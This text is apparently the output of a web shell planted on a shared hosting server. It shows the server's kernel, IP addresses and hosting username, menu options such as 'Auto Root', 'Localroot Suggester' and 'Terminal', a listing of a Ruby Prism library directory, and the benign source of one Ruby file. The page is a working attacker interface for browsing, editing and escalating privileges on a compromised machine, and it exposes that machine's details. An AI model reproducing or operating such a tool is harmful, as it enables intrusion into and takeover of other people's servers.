Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 198.54.116.248 & Your IP : 216.73.216.104
Domains :
Cant Read [ /etc/named.conf ]
User : tailxcij
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ruby /
prism /
Delete
Unzip
Name
Size
Permission
Date
Action
parse_result
[ DIR ]
drwxr-xr-x
2026-02-10 10:04
polyfill
[ DIR ]
drwxr-xr-x
2026-02-10 10:04
translation
[ DIR ]
drwxr-xr-x
2026-02-10 10:04
compiler.rb
23.76
KB
-rw-r--r--
2026-01-27 16:00
desugar_compiler.rb
9.89
KB
-rw-r--r--
2026-01-27 16:00
dispatcher.rb
111.71
KB
-rw-r--r--
2026-01-27 16:00
dsl.rb
56.77
KB
-rw-r--r--
2026-01-27 16:00
ffi.rb
19.42
KB
-rw-r--r--
2026-01-27 16:00
inspect_visitor.rb
124.61
KB
-rw-r--r--
2026-01-27 16:00
lex_compat.rb
32.44
KB
-rw-r--r--
2026-01-27 16:00
mutation_compiler.rb
21.1
KB
-rw-r--r--
2026-01-27 16:00
node.rb
588.89
KB
-rw-r--r--
2026-01-27 16:00
node_ext.rb
14.97
KB
-rw-r--r--
2026-01-27 16:00
pack.rb
5.88
KB
-rw-r--r--
2026-01-27 16:00
parse_result.rb
29.38
KB
-rw-r--r--
2026-01-27 16:00
pattern.rb
8.16
KB
-rw-r--r--
2026-01-27 16:00
reflection.rb
28.82
KB
-rw-r--r--
2026-01-27 16:00
relocation.rb
15.12
KB
-rw-r--r--
2026-01-27 16:00
serialize.rb
124.59
KB
-rw-r--r--
2026-01-27 16:00
string_query.rb
775
B
-rw-r--r--
2026-01-27 16:00
translation.rb
586
B
-rw-r--r--
2026-01-27 16:00
visitor.rb
24.12
KB
-rw-r--r--
2026-01-27 16:00
Save
Rename
# frozen_string_literal: true # :markup: markdown module Prism # Query methods that allow categorizing strings based on their context for # where they could be valid in a Ruby syntax tree. class StringQuery # The string that this query is wrapping. attr_reader :string # Initialize a new query with the given string. def initialize(string) @string = string end # Whether or not this string is a valid local variable name. def local? StringQuery.local?(string) end # Whether or not this string is a valid constant name. def constant? StringQuery.constant?(string) end # Whether or not this string is a valid method name. def method_name? StringQuery.method_name?(string) end end end